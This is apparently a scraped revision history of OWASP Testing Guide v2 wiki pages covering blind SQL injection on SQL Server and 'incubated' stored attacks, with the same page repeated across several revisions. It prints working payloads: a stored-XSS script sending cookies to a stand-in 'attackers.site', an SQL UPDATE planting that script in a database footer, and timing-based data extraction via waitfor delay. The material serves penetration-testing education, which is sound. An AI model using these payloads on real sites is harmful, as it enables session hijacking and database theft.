In fact, what we have here is two things: a '''SQL-injection vulnerability''' and a '''covert channel''' that allows the penetration tester to get 1 bit of information. Hence, using several queries (as much queries as the bits in the required information) the pen tester can get any data that is in the database. Say, the string<br />
<br />
declare @s varchar(8000) <br />
select @s = db_name() <br />
if (ascii(substring(@s, ''n'', ''b'')) & ( power(2, 0))) > 0 waitfor delay 0:0:5<br />
<br />
will wait for 5 seconds if the ''n''th bit of the name of the current database is ''b'', and will return at once if it is ''1-b''. After discovering the value of each byte, the pen tester will see if the first bit of the next byte is neither 1 nor 0, this means that the string has ended!<br />
<br />
However, it might happen that the command ''waitfor'' is not available (e.g., because it is filtered by an IPS/web application firewall). This doesn't mean that blind SQL-injection attacks cannot be done, the pen tester should only come up with any time consuming operation that is not filtered. For example<br />
<br />
declare @i int select @i = 0<br />
while @i < 0xaffff begin<br />
select @i = @i + 1<br />
end<br />
<br />
<br />
===Checking for version and vulnerabilities===<br />
In case the pen tester can make some queries to the database engine, he will be able to get the database engine's version. He can next match this product name and version with known vulnerabilities or a zero-day exploit that he might have access to.<br />
<br />
== Gray Box testing and example == <br />
'''Testing for Topic X vulnerabilities:'''<br><br />
...<br><br />
'''Result Expected:'''<br><br />
...<br><br><br />
== References ==<br />
'''Whitepapers'''<br><br />
...<br><br />
'''Tools'''<br><br />
...<br><br />
{{Category:OWASP Testing Project AoC}}<br />
[[OWASP Testing Guide v2 Table of Contents]]<br />
<br />
{{Template:Stub}}</div>Watahttps://wiki.owasp.org/index.php?title=Testing_for_SQL_Server&diff=11532Testing for SQL Server2006-11-03T20:44:53Z<p>Wata: /* Short Description of the Issue (Topic and Explanation) */</p>
<hr />
<div>{{Template:OWASP Testing Guide v2}}<br />
<br />
== Short Description of the Issue (Topic and Explanation) == <br />
[[http://www.owasp.org/index.php/SQL_Injection_AoC SQL injection vulnerabilities]] occur whenever input is used in the construction of an SQL query without being adequately constrained or sanitized. The use of dynamic SQL (the construction of SQL queries by concatenation of strings) opens the door to these vulnerabilities. SQL injection allows an attacker to access the SQL servers. It allows for the execution of SQL code under the privileges of the user used to connect to the database.<br />
<br />
The Microsoft SQL server has a few particularities so that some exploits need to be specially customized for this application. That's the subject of this section.<br />
<br />
== Black Box testing and example ==<br />
'''Testing for Topic X vulnerabilities:''' <br><br />
...<br><br />
'''Result Expected:'''<br><br />
...<br><br><br />
== Gray Box testing and example == <br />
'''Testing for Topic X vulnerabilities:'''<br><br />
...<br><br />
'''Result Expected:'''<br><br />
...<br><br><br />
== References ==<br />
'''Whitepapers'''<br><br />
...<br><br />
'''Tools'''<br><br />
...<br><br />
{{Category:OWASP Testing Project AoC}}<br />
[[OWASP Testing Guide v2 Table of Contents]]<br />
<br />
{{Template:Stub}}</div>Watahttps://wiki.owasp.org/index.php?title=Testing_for_Incubated_Vulnerability_(OTG-INPVAL-015)&diff=11531Testing for Incubated Vulnerability (OTG-INPVAL-015)2006-11-03T20:43:10Z<p>Wata: /* References */</p>
<hr />
<div>{{Template:OWASP Testing Guide v2}}<br />
<br />
== Short Description of the Issue (Topic and Explanation) == <br />
<br />
Exploitation of some vulnerabilities, or even functional features of a web application will allow an attacker to plant a piece of data that will later be retrieved by an unsuspected user or other component of the system, exploiting some vulnerability there. <br />
<br />
In a penetration test, '''incubated attacks''' can be used to assess the criticality of certain bugs, using the particular security issue found to build a client-side based attack that usually will be used to target a large number of victims at the same time (i.e. all users browsing the site). <br />
<br />
This type of asynchronous attack covers a great spectrum of attack vectors, among them the following: <br />
<br />
* File upload components in a web application, allowing the attacker to upload corrupted media files (jpg images exploiting CVE-2004-0200, png images exploiting CVE-2004-0597, executable files, site pages with active component, etc)<br />
<br />
* Cross-site scripting issues in public forums posts (see XSS description for additional details). An attacker could potentially store malicious scripts or code in a repository in the backend of the web-application (e.g., a database) so that this script/code gets executed by one of the users (end users, administrators, etc). The archetypical incubated attack is exemplified by using a cross-site scripting vulnerability in a user forum, bulletin board or blog in order to inject some javascript code at the vulnerable page, and will be eventually rendered and executed at the site user's browser --using the trust level of the original (vulnerable) site at the user's browser.<br />
<br />
* SQL/XPATH Injection allowing the attacker to upload content to a database, which will be later retrieved as part of the active content in a web page. For example, if the attacker can post arbitrary Javascript in a bulletin board so that it gets executed by users, then he might take control of their browsers (e.g., [[http://sourceforge.net/projects/xss-proxy]]).<br />
<br />
* Misconfigured servers allowing installation of java packages or similar web site components (i.e. Tomcat, or web hosting consoles such as Plesk, CPanel, Helm, etc.)<br />
<br />
== Black Box testing and example ==<br />
<br />
===a. File Upload Sample:===<br />
<br />
Verify the content type allowed to upload to the web application and the resultant URL for the uploaded file. Upload a file that will exploit a component in the local user workstation when viewed or downloaded by the user. <br />
<br />
Send your victim an email or other kind of alert in order to lead him/her to browse the page. <br />
<br />
The expected result is the exploit will be triggered when the user browses the resultant page or downloads and executes the file from the trusted site. <br />
<br />
<br />
===b. XSS sample on a bulletin board===<br />
<br />
1. Introduce ''javascript'' code as the value for the vulnerable field, for instance:<br />
<br />
<nowiki><script>document.write('<img src="http://attackers.site/cv.jpg?'+document.cookie+'">')</script></nowiki><br />
<br />
2. Direct users to browse the vulnerable page or wait for the users to browse it. Have a <nowiki>"listener"</nowiki> at ''attackers.site'' host listening for all incoming connections. <br />
<br />
3. When users browse the vulnerable page, a request containing their cookie (''document.cookie'' is included as part of the requested URL) will be sent to the ''attackers.site'' host, such as the following:<br />
<br />
<nowiki>- GET /cv.jpg?SignOn=COOKIEVALUE1;%20ASPSESSIONID=ROGUEIDVALUE;</nowiki><br />
<nowiki>%20JSESSIONID=ADIFFERENTVALUE:-1;%20ExpirePage=https://vulnerable.site/site/;</nowiki><br />
<nowiki>TOKEN=28_Sep_2006_21:46:36_GMT HTTP/1.1</nowiki><br />
<br />
<br />
4. Use cookies obtained to impersonate users at the vulnerable site. <br />
<br />
<br />
===c. SQL Injection sample===<br />
<br />
Usually, this set of examples leverages XSS attacks by exploiting a SQL-injection vulnerability. The first thing to test, is whether the target site has a SQL-injection vulnerability. This is described in Section 4.2. For each SQL-injection vulnerability, there is an underlying set of constraints describing the kind of queries that the attacker/pen-tester is allowed to do. The pen tester then has to match the XSS attacks he has devised with the entries that he is allowed to insert.<br />
<br />
1. In a similar fashion as the previous XSS example, use a web page field vulnerable to SQL injection issues to change a value in the database that would be used by the application as input to be shown at the site without proper filtering (this would be a combination of an SQL injection and a XSS issue). For instance, let's suppose there is a ''footer'' table at the database with all footers for the web site pages, including a ''notice'' field with the legal notice that appears at the bottom of each web page. You could use the following query to inject javascript code to the ''notice'' field at the ''footer'' table in the database. <br />
<br />
SELECT field1, field2, field3<br />
FROM table_x<br />
WHERE field2 = 'x';<br />
UPDATE footer<br />
<nowiki>SET notice = 'Copyright 1999-2030%20</nowiki><br />
<nowiki><script>document.write(\'<img src="http://attackers.site/cv.jpg?\'+document.cookie+\'">\')</script>'</nowiki><br />
WHERE notice = 'Copyright 1999-2030';<br />
<br />
2. Now, each user browsing the site will silently send his cookies to the ''attackers.site'' (steps b.2 to b.4). <br />
<br />
<br />
===d. Misconfigured server===<br />
<br />
Some web servers present an administration interface that may allow an attacker to upload active components of her choice to the site. This could be the case with Apache Tomcat servers that doesn’t enforce strong credentials to access its Web Application Manager (or in the case the pen testers have been able to obtain valid credentials for the administration module by other means). <br />
In this case, a WAR file can be uploaded and a new web application deployed at the site, which will not only allow the pen tester to execute code of her choice locally at the server, but also to plant an application at the trusted site, which the site regular users can then access (most probably with a higher degree of trust than when accessing a different site).<br />
<br />
As should also be obvious, the ability to change web page contents at the server, via any vulnerabilities that may be exploitable at the host which will give the attacker webroot write permissions, will also be useful towards planting such an incubated attack on the web server pages (actually, this is a known infection-spread method for some web server worms).<br />
<br />
== Gray Box testing and example == <br />
Gray/white testing techniques will be the same as previously discussed.<br />
<br />
== References ==<br />
'''Whitepapers'''<br><br />
...<br><br />
'''Tools'''<br><br />
<br />
1. [[http://sourceforge.net/projects/xss-proxy XSS-proxy]])<br />
<br />
<br><br />
{{Category:OWASP Testing Project AoC}}<br />
[[OWASP Testing Guide v2 Table of Contents]]<br />
<br />
{{Template:Stub}}</div>Watahttps://wiki.owasp.org/index.php?title=Testing_for_Incubated_Vulnerability_(OTG-INPVAL-015)&diff=11530Testing for Incubated Vulnerability (OTG-INPVAL-015)2006-11-03T20:42:30Z<p>Wata: /* Gray Box testing and example */</p>
<hr />
<div>{{Template:OWASP Testing Guide v2}}<br />
<br />
== Short Description of the Issue (Topic and Explanation) == <br />
<br />
Exploitation of some vulnerabilities, or even functional features of a web application will allow an attacker to plant a piece of data that will later be retrieved by an unsuspected user or other component of the system, exploiting some vulnerability there. <br />
<br />
In a penetration test, '''incubated attacks''' can be used to assess the criticality of certain bugs, using the particular security issue found to build a client-side based attack that usually will be used to target a large number of victims at the same time (i.e. all users browsing the site). <br />
<br />
This type of asynchronous attack covers a great spectrum of attack vectors, among them the following: <br />
<br />
* File upload components in a web application, allowing the attacker to upload corrupted media files (jpg images exploiting CVE-2004-0200, png images exploiting CVE-2004-0597, executable files, site pages with active component, etc)<br />
<br />
* Cross-site scripting issues in public forums posts (see XSS description for additional details). An attacker could potentially store malicious scripts or code in a repository in the backend of the web-application (e.g., a database) so that this script/code gets executed by one of the users (end users, administrators, etc). The archetypical incubated attack is exemplified by using a cross-site scripting vulnerability in a user forum, bulletin board or blog in order to inject some javascript code at the vulnerable page, and will be eventually rendered and executed at the site user's browser --using the trust level of the original (vulnerable) site at the user's browser.<br />
<br />
* SQL/XPATH Injection allowing the attacker to upload content to a database, which will be later retrieved as part of the active content in a web page. For example, if the attacker can post arbitrary Javascript in a bulletin board so that it gets executed by users, then he might take control of their browsers (e.g., [[http://sourceforge.net/projects/xss-proxy]]).<br />
<br />
* Misconfigured servers allowing installation of java packages or similar web site components (i.e. Tomcat, or web hosting consoles such as Plesk, CPanel, Helm, etc.)<br />
<br />
== Black Box testing and example ==<br />
<br />
===a. File Upload Sample:===<br />
<br />
Verify the content type allowed to upload to the web application and the resultant URL for the uploaded file. Upload a file that will exploit a component in the local user workstation when viewed or downloaded by the user. <br />
<br />
Send your victim an email or other kind of alert in order to lead him/her to browse the page. <br />
<br />
The expected result is the exploit will be triggered when the user browses the resultant page or downloads and executes the file from the trusted site. <br />
<br />
<br />
===b. XSS sample on a bulletin board===<br />
<br />
1. Introduce ''javascript'' code as the value for the vulnerable field, for instance:<br />
<br />
<nowiki><script>document.write('<img src="http://attackers.site/cv.jpg?'+document.cookie+'">')</script></nowiki><br />
<br />
2. Direct users to browse the vulnerable page or wait for the users to browse it. Have a <nowiki>"listener"</nowiki> at ''attackers.site'' host listening for all incoming connections. <br />
<br />
3. When users browse the vulnerable page, a request containing their cookie (''document.cookie'' is included as part of the requested URL) will be sent to the ''attackers.site'' host, such as the following:<br />
<br />
<nowiki>- GET /cv.jpg?SignOn=COOKIEVALUE1;%20ASPSESSIONID=ROGUEIDVALUE;</nowiki><br />
<nowiki>%20JSESSIONID=ADIFFERENTVALUE:-1;%20ExpirePage=https://vulnerable.site/site/;</nowiki><br />
<nowiki>TOKEN=28_Sep_2006_21:46:36_GMT HTTP/1.1</nowiki><br />
<br />
<br />
4. Use cookies obtained to impersonate users at the vulnerable site. <br />
<br />
<br />
===c. SQL Injection sample===<br />
<br />
Usually, this set of examples leverages XSS attacks by exploiting a SQL-injection vulnerability. The first thing to test, is whether the target site has a SQL-injection vulnerability. This is described in Section 4.2. For each SQL-injection vulnerability, there is an underlying set of constraints describing the kind of queries that the attacker/pen-tester is allowed to do. The pen tester then has to match the XSS attacks he has devised with the entries that he is allowed to insert.<br />
<br />
1. In a similar fashion as the previous XSS example, use a web page field vulnerable to SQL injection issues to change a value in the database that would be used by the application as input to be shown at the site without proper filtering (this would be a combination of an SQL injection and a XSS issue). For instance, let's suppose there is a ''footer'' table at the database with all footers for the web site pages, including a ''notice'' field with the legal notice that appears at the bottom of each web page. You could use the following query to inject javascript code to the ''notice'' field at the ''footer'' table in the database. <br />
<br />
SELECT field1, field2, field3<br />
FROM table_x<br />
WHERE field2 = 'x';<br />
UPDATE footer<br />
<nowiki>SET notice = 'Copyright 1999-2030%20</nowiki><br />
<nowiki><script>document.write(\'<img src="http://attackers.site/cv.jpg?\'+document.cookie+\'">\')</script>'</nowiki><br />
WHERE notice = 'Copyright 1999-2030';<br />
<br />
2. Now, each user browsing the site will silently send his cookies to the ''attackers.site'' (steps b.2 to b.4). <br />
<br />
<br />
===d. Misconfigured server===<br />
<br />
Some web servers present an administration interface that may allow an attacker to upload active components of her choice to the site. This could be the case with Apache Tomcat servers that doesn’t enforce strong credentials to access its Web Application Manager (or in the case the pen testers have been able to obtain valid credentials for the administration module by other means). <br />
In this case, a WAR file can be uploaded and a new web application deployed at the site, which will not only allow the pen tester to execute code of her choice locally at the server, but also to plant an application at the trusted site, which the site regular users can then access (most probably with a higher degree of trust than when accessing a different site).<br />
<br />
As should also be obvious, the ability to change web page contents at the server, via any vulnerabilities that may be exploitable at the host which will give the attacker webroot write permissions, will also be useful towards planting such an incubated attack on the web server pages (actually, this is a known infection-spread method for some web server worms).<br />
<br />
== Gray Box testing and example == <br />
Gray/white testing techniques will be the same as previously discussed.<br />
<br />
== References ==<br />
'''Whitepapers'''<br><br />
...<br><br />
'''Tools'''<br><br />
...<br><br />
{{Category:OWASP Testing Project AoC}}<br />
[[OWASP Testing Guide v2 Table of Contents]]<br />
<br />
{{Template:Stub}}</div>Watahttps://wiki.owasp.org/index.php?title=Testing_for_Incubated_Vulnerability_(OTG-INPVAL-015)&diff=11529Testing for Incubated Vulnerability (OTG-INPVAL-015)2006-11-03T20:42:01Z<p>Wata: /* Black Box testing and example */</p>
<hr />
<div>{{Template:OWASP Testing Guide v2}}<br />
<br />
== Short Description of the Issue (Topic and Explanation) == <br />
<br />
Exploitation of some vulnerabilities, or even functional features of a web application will allow an attacker to plant a piece of data that will later be retrieved by an unsuspected user or other component of the system, exploiting some vulnerability there. <br />
<br />
In a penetration test, '''incubated attacks''' can be used to assess the criticality of certain bugs, using the particular security issue found to build a client-side based attack that usually will be used to target a large number of victims at the same time (i.e. all users browsing the site). <br />
<br />
This type of asynchronous attack covers a great spectrum of attack vectors, among them the following: <br />
<br />
* File upload components in a web application, allowing the attacker to upload corrupted media files (jpg images exploiting CVE-2004-0200, png images exploiting CVE-2004-0597, executable files, site pages with active component, etc)<br />
<br />
* Cross-site scripting issues in public forums posts (see XSS description for additional details). An attacker could potentially store malicious scripts or code in a repository in the backend of the web-application (e.g., a database) so that this script/code gets executed by one of the users (end users, administrators, etc). The archetypical incubated attack is exemplified by using a cross-site scripting vulnerability in a user forum, bulletin board or blog in order to inject some javascript code at the vulnerable page, and will be eventually rendered and executed at the site user's browser --using the trust level of the original (vulnerable) site at the user's browser.<br />
<br />
* SQL/XPATH Injection allowing the attacker to upload content to a database, which will be later retrieved as part of the active content in a web page. For example, if the attacker can post arbitrary Javascript in a bulletin board so that it gets executed by users, then he might take control of their browsers (e.g., [[http://sourceforge.net/projects/xss-proxy]]).<br />
<br />
* Misconfigured servers allowing installation of java packages or similar web site components (i.e. Tomcat, or web hosting consoles such as Plesk, CPanel, Helm, etc.)<br />
<br />
== Black Box testing and example ==<br />
<br />
===a. File Upload Sample:===<br />
<br />
Verify the content type allowed to upload to the web application and the resultant URL for the uploaded file. Upload a file that will exploit a component in the local user workstation when viewed or downloaded by the user. <br />
<br />
Send your victim an email or other kind of alert in order to lead him/her to browse the page. <br />
<br />
The expected result is the exploit will be triggered when the user browses the resultant page or downloads and executes the file from the trusted site. <br />
<br />
<br />
===b. XSS sample on a bulletin board===<br />
<br />
1. Introduce ''javascript'' code as the value for the vulnerable field, for instance:<br />
<br />
<nowiki><script>document.write('<img src="http://attackers.site/cv.jpg?'+document.cookie+'">')</script></nowiki><br />
<br />
2. Direct users to browse the vulnerable page or wait for the users to browse it. Have a <nowiki>"listener"</nowiki> at ''attackers.site'' host listening for all incoming connections. <br />
<br />
3. When users browse the vulnerable page, a request containing their cookie (''document.cookie'' is included as part of the requested URL) will be sent to the ''attackers.site'' host, such as the following:<br />
<br />
<nowiki>- GET /cv.jpg?SignOn=COOKIEVALUE1;%20ASPSESSIONID=ROGUEIDVALUE;</nowiki><br />
<nowiki>%20JSESSIONID=ADIFFERENTVALUE:-1;%20ExpirePage=https://vulnerable.site/site/;</nowiki><br />
<nowiki>TOKEN=28_Sep_2006_21:46:36_GMT HTTP/1.1</nowiki><br />
<br />
<br />
4. Use cookies obtained to impersonate users at the vulnerable site. <br />
<br />
<br />
===c. SQL Injection sample===<br />
<br />
Usually, this set of examples leverages XSS attacks by exploiting a SQL-injection vulnerability. The first thing to test, is whether the target site has a SQL-injection vulnerability. This is described in Section 4.2. For each SQL-injection vulnerability, there is an underlying set of constraints describing the kind of queries that the attacker/pen-tester is allowed to do. The pen tester then has to match the XSS attacks he has devised with the entries that he is allowed to insert.<br />
<br />
1. In a similar fashion as the previous XSS example, use a web page field vulnerable to SQL injection issues to change a value in the database that would be used by the application as input to be shown at the site without proper filtering (this would be a combination of an SQL injection and a XSS issue). For instance, let's suppose there is a ''footer'' table at the database with all footers for the web site pages, including a ''notice'' field with the legal notice that appears at the bottom of each web page. You could use the following query to inject javascript code to the ''notice'' field at the ''footer'' table in the database. <br />
<br />
SELECT field1, field2, field3<br />
FROM table_x<br />
WHERE field2 = 'x';<br />
UPDATE footer<br />
<nowiki>SET notice = 'Copyright 1999-2030%20</nowiki><br />
<nowiki><script>document.write(\'<img src="http://attackers.site/cv.jpg?\'+document.cookie+\'">\')</script>'</nowiki><br />
WHERE notice = 'Copyright 1999-2030';<br />
<br />
2. Now, each user browsing the site will silently send his cookies to the ''attackers.site'' (steps b.2 to b.4). <br />
<br />
<br />
===d. Misconfigured server===<br />
<br />
Some web servers present an administration interface that may allow an attacker to upload active components of her choice to the site. This could be the case with Apache Tomcat servers that doesn’t enforce strong credentials to access its Web Application Manager (or in the case the pen testers have been able to obtain valid credentials for the administration module by other means). <br />
In this case, a WAR file can be uploaded and a new web application deployed at the site, which will not only allow the pen tester to execute code of her choice locally at the server, but also to plant an application at the trusted site, which the site regular users can then access (most probably with a higher degree of trust than when accessing a different site).<br />
<br />
As should also be obvious, the ability to change web page contents at the server, via any vulnerabilities that may be exploitable at the host which will give the attacker webroot write permissions, will also be useful towards planting such an incubated attack on the web server pages (actually, this is a known infection-spread method for some web server worms).<br />
<br />
== Gray Box testing and example == <br />
'''Testing for Topic X vulnerabilities:'''<br><br />
...<br><br />
'''Result Expected:'''<br><br />
...<br><br><br />
== References ==<br />
'''Whitepapers'''<br><br />
...<br><br />
'''Tools'''<br><br />
...<br><br />
{{Category:OWASP Testing Project AoC}}<br />
[[OWASP Testing Guide v2 Table of Contents]]<br />
<br />
{{Template:Stub}}</div>Watahttps://wiki.owasp.org/index.php?title=Testing_for_Incubated_Vulnerability_(OTG-INPVAL-015)&diff=11528Testing for Incubated Vulnerability (OTG-INPVAL-015)2006-11-03T20:36:11Z<p>Wata: /* Short Description of the Issue (Topic and Explanation) */</p>
<hr />
<div>{{Template:OWASP Testing Guide v2}}<br />
<br />
== Short Description of the Issue (Topic and Explanation) == <br />
<br />
Exploitation of some vulnerabilities, or even functional features of a web application will allow an attacker to plant a piece of data that will later be retrieved by an unsuspected user or other component of the system, exploiting some vulnerability there. <br />
<br />
In a penetration test, '''incubated attacks''' can be used to assess the criticality of certain bugs, using the particular security issue found to build a client-side based attack that usually will be used to target a large number of victims at the same time (i.e. all users browsing the site). <br />
<br />
This type of asynchronous attack covers a great spectrum of attack vectors, among them the following: <br />
<br />
* File upload components in a web application, allowing the attacker to upload corrupted media files (jpg images exploiting CVE-2004-0200, png images exploiting CVE-2004-0597, executable files, site pages with active component, etc)<br />
<br />
* Cross-site scripting issues in public forums posts (see XSS description for additional details). An attacker could potentially store malicious scripts or code in a repository in the backend of the web-application (e.g., a database) so that this script/code gets executed by one of the users (end users, administrators, etc). The archetypical incubated attack is exemplified by using a cross-site scripting vulnerability in a user forum, bulletin board or blog in order to inject some javascript code at the vulnerable page, and will be eventually rendered and executed at the site user's browser --using the trust level of the original (vulnerable) site at the user's browser.<br />
<br />
* SQL/XPATH Injection allowing the attacker to upload content to a database, which will be later retrieved as part of the active content in a web page. For example, if the attacker can post arbitrary Javascript in a bulletin board so that it gets executed by users, then he might take control of their browsers (e.g., [[http://sourceforge.net/projects/xss-proxy]]).<br />
<br />
* Misconfigured servers allowing installation of java packages or similar web site components (i.e. Tomcat, or web hosting consoles such as Plesk, CPanel, Helm, etc.)<br />
<br />
== Black Box testing and example ==<br />
'''Testing for Topic X vulnerabilities:''' <br><br />
...<br><br />
'''Result Expected:'''<br><br />
...<br><br><br />
== Gray Box testing and example == <br />
'''Testing for Topic X vulnerabilities:'''<br><br />
...<br><br />
'''Result Expected:'''<br><br />
...<br><br><br />
== References ==<br />
'''Whitepapers'''<br><br />
...<br><br />
'''Tools'''<br><br />
...<br><br />
{{Category:OWASP Testing Project AoC}}<br />
[[OWASP Testing Guide v2 Table of Contents]]<br />
<br />
{{Template:Stub}}</div>Wata